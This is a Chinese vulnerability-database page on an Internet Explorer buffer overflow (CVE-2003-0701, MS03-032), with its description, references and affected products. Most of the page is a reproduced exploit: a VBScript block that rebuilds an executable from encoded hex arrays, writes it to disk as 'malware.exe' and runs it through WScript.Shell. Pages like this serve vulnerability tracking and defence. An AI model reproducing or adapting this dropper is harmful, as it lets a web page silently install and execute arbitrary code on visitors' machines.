Internet Explorer缓冲区溢出漏洞

Internet Explorer缓冲区溢出漏洞

漏洞ID 1107456 漏洞类型 缓冲区溢出
发布时间 2003-08-21 更新时间 2003-08-27
图片[1]-Internet Explorer缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0701
图片[2]-Internet Explorer缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200308-125
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/83
https://www.securityfocus.com/bid/82762
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-125
|漏洞详情
对于某些支持双字节编码的语言(例如:日语)的InternetExplorer6SP1版本存在缓冲区溢出漏洞。远程攻击者可以借助Object标签的Type属性执行任意代码,该漏洞是CVE-2003-0344的变体。
|漏洞EXP
<title>by malware M03-032 Exploit</title>
<script language=vbs>

self.MoveTo 5000,5000

dim v(24)
cut=""

v(0)="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,
y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,y,A0,8E,C0,C3,66"
v(1)=",B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,04,2B,D8,2B,
D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,z,33,F6,F3,66,A5,C3"
v(2)=",1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2C,01,F3,A4,
8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,48,03,BA,C8,03,32,C0,EE"
v(3)=",42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,FB,EC,A8,08,
74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21,yF,B1,C0,90,1D,7B"
v(4)=",88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1,8C,B1,77,
98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6C,45,24,BF,21,97,8E,D0,8A"
v(5)=",1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A,38,97,96,
2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,64,84,1B,5A,D9,1D,CE,AF,36"
v(6)=",3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,97,C8,4B,C2,
C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,20,A9,D5,23,19,55,4C,55,AA"
v(7)=",62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46,6B,61,6B,2A,
7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91"
v(8)=",50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84,56,A8,A0,AE,
1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45"
v(9)=",5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6,7D,BB,15,BE,
78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,84,8A,55,5D,35,1F,71,25,92"
v(10)=",79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D0,14,67,39,
2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=",D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B3,1F,D3,53,
20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=",B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28,1B,14,BF,6F,
A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38"
v(13)=",53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E,51,95,5E,A2,
3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94"
v(14)=",41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A,5E,CB,A7,6F,
47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=",44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D,3D,AA,48,7D,
AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88"
v(16)=",90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B,D8,A1,5B,9F,
63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6"
v(17)=",4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47,A2,8E,B1,84,
51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=",14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20,y2,21,y2,22,y2,
23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=",32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E,y2,3F,y2,3F,y2,
3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F,08,y,3F,09,y,3F"
v(20)=",0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13,y,3F,14,y,3F,15,y,3F,
16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D,y,3F"
v(21)=",1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27,y,3F,28,y,3F,29,y,
3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31,y,3F"
v(22)=",32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B,y,3F,3C,y,3F,3D,y,
3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,3F2,06,3F2,07,3F2,08"
v(23)=",3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,13,3F2,14,3F2,
15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,3F2,1F,3F2,20,3F2,21,3F2,22,
3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=",3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,31,3F2,32,3F2,
33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,3F2,3D,3F2,3E,3F5,3F"

function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next

For m = 0 To UBound(v)
it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "malware.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)

</script>

// milw0rm.com [2003-08-21]
|受影响的产品
Microsoft Internet Explorer for Unix 6.0 Windows Server 2

Microsoft Internet Explorer 5.0.1

Microsoft Windows 2000 Advanced Server SP2

Microsoft

|参考资料

来源:US-CERTVulnerabilityNote:VU#334928
名称:VU#334928
链接:http://www.kb.cert.org/vuls/id/334928
来源:MS
名称:MS03-032
链接:http://www.microsoft.com/technet/security/bulletin/ms03-032.asp
来源:BUGTRAQ
名称:20030820[SNSAdvisoryNo.68]InternetExplorerObjectTypeBufferOverflowinDouble-ByteCharacterSetEnvironment
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=106148101210479&w;=2
来源:XF
名称:ie-dbcs-object-bo(12970)
链接:http://xforce.iss.net/xforce/xfdb/12970

相关推荐: Microsoft URLScan / RSA Security SecurID Configuration Enumeration Weakness

Microsoft URLScan / RSA Security SecurID Configuration Enumeration Weakness 漏洞ID 1099664 漏洞类型 Configuration Error 发布时间 2003-08-14 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享